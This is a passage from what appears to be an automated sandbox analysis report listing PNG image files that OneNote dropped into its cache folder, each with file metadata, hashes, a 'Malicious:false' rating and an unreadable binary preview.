                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001G.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001H.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001I.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001J.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001K.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001L.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001M.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001N.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001O.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001P.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001Q.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001R.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
